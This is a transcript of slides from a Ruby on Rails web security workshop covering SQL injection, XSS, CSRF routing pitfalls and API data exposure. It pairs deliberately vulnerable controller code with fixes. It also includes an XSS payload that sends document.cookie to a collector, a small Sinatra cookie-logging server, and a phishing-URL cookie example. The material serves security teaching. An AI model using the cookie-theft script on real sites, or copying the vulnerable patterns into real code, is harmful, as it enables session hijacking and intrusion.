Web Applications Hacking – Ruby on Rails example. Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.

1. Web applications hacking
Ruby on Rails example
by Karol Topolski

2. ● Software House located in Krakow
● Ruby on Rails, Android and iOS
● Specialized in building web and mobile applications
● Collaborating with many companies and startups from all over
the world
ABOUT US:

3. 2009 - software house was founded
50 projects created
40 employees
Awards:
OUR HISTORY:
Top Web & Software Developers
in Poland 2015
Top Tens Ruby on Rails
Development Companies

4. HOMEAHEAD

5. PROEST

6. Software for
gastronomy

8. OWASP TOP 10
1. Injection
2. Broken authentication and session management
3. Cross-Site Scripting
4. Insecure direct object reference
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross-Site Request Forgery
9. Using components with known vulnerabilities
10. Unvalidated redirects and forwards

9. Target Application

10. Simple Ruby on Rails forum
Ruby 2.3.0
Rails 4.2.6
PostgreSQL 9.4
https://github.com/railwaymen/hacking-forum.git

11. PostgreSQL Database schema

15. # app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:

17. # app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:

20. Is SQL injection
impossible in Rails?

21. Unfortunately, no.
It’s possible,
just not dropping tables.

22. Further reading:
rails-sqli.org

24. # app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:

26. # app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:

28. <!-- XSS test -->
Hi guys!
<script> alert(“I came for your cookies!“) </script>
<!-- Time to get some cookies! -->
What’s up?
<script>
xhttp = new XMLHttpRequest();
xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie);
xhttp.send();
</script>
XSS ATTACK - TEST AND STEALING COOKIES

29. require ‘sinatra’
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[:cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER

32. Are all cookies HTTPOnly
in Rails?

33. cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = {
value: ‘http://localhost/after_sign_in_path’,
httponly: true
}
// finally safe
UNFORTUNATELY - NO. ALWAYS USE THIS HASH!

34. It’s safe from cookies stealing,
but is it safe from XSS?

35. # app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= sanitize comment.content.html_safe
COMMENTS - create and show:

36. Further reading:
molily.de/xss/

38. # app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
# Prevent CSRF attacks by raising an exception.
# For APIs you may want to use :null_session instead.
protect_from_forgery with: :exception
end
DEFAULT CSRF PROTECTION IN RAILS:

40. Is Rails CSRF protection
unbreakable?

41. HTTP Verbs
● GET
● POST
● PUT
● PATCH
● DELETE
● HEAD
● OPTIONS
● TRACE
● CONNECT

42. HTTP Verbs NOT protected by Rails CSRF
● GET
● POST
● PUT
● PATCH
● DELETE
● HEAD
● OPTIONS
● TRACE
● CONNECT

43. CSRF pitfall
in Rails routing

44. # config/routes.rb
match ‘/forum_threads/:forum_thread_id/comments/:id/update’,
to: ‘comments#update’,
via: :all # Rails 4+
CSRF PITFALL IN RAILS ROUTING - MATCH:

47. Is Rails CSRF protection
100% safe?

48. Yes it is - unless you’re
not staying close to Rails guides

49. Further reading:
https://rorsecurity.info/portfolio/cross-site-
request-forgery-and-rails

51. Sensitive data exposure
1. Credentials leaking to public repositories.
2. Lack of proper in-app authorization.
3. Debugging information in production enviroments.
4. Access not restricted, wrong access privileges.
5. Lack of encryption.
6. API responses containing sensitive data.

52. Protecting against sensitive data exposure
1. Code reviews.
2. Careful authorization.
3. Strict access.
4. Encryption.
5. API exposing only necessary information.

53. Creating the secure API

56. # app/controllers/forum_threads_controller.rb
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads }
end
end
GENERATED RAILS API

57. [
{
”id”: 2,
”title”: "Curabitur vel vulputate libero.",
”created_at”: "2016-04-18T10:10:40.648Z",
”updated_at”: "2016-04-18T10:10:40.648Z"
},
{
"id": 1,
"title": "Lorem ipsum dolor sit amet.",
"created_at": "2016-04-18T10:10:40.607Z",
"updated_at": "2016-04-18T10:10:40.607Z"
}
]
GENERATED RAILS API - OUTPUT

58. # app/controllers/forum_threads_controller.rb
def index
@threads = ForumThread.order(updated_at: :desc)
respond_to do |format|
format.html
format.json { render json: @threads.only(:title).to_json }
end
end
GENERATED RAILS API - SECURING THE OUTPUT

59. [
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT

61. Solutions for building pretty, secure APIs
Active Model Serializers
● Object Oriented approach
● Ability to define decorating methods
● All Ruby!
● Flexible
● Easy to test
● Adapter to follow JSON API v1.0 schema
● YARD documented
Jbuilder
● Templates approach
● ERblike - might be easy for newcomers
● Flexible
● Hard to test
● No real “adapter” - if you want JSON
API v1.0, you have to do it by yourself

62. Summary

63. Things to remember from this workshop:
1. Never trust anything that comes from user. Params, cookies, headers,
everything. Nothing that comes from user is safe to use.
2. Always sanitize your HTML output. Especially when you’re allowing
links or images that comes from user.
3. Be careful with match routing. Just don’t use it if you don’t have to.
4. Inspect your outputs. Return only necessary information from your API.
5. Last but not least. Get someone to review your code.

64. Thank you for your attention.

65. Na zjeździe 11
30-527 Krakow, Poland
tel: +48 12 391 60 76
Silicon Valley
Acceleration Center.
180 Sansome Street
San Francisco, CA 94104
tel: 1-415-449-4791
info@railwaymen.org
www.railwaymen.org
@Railwaymen_org
railwaymen.software.development
/company/railwaymen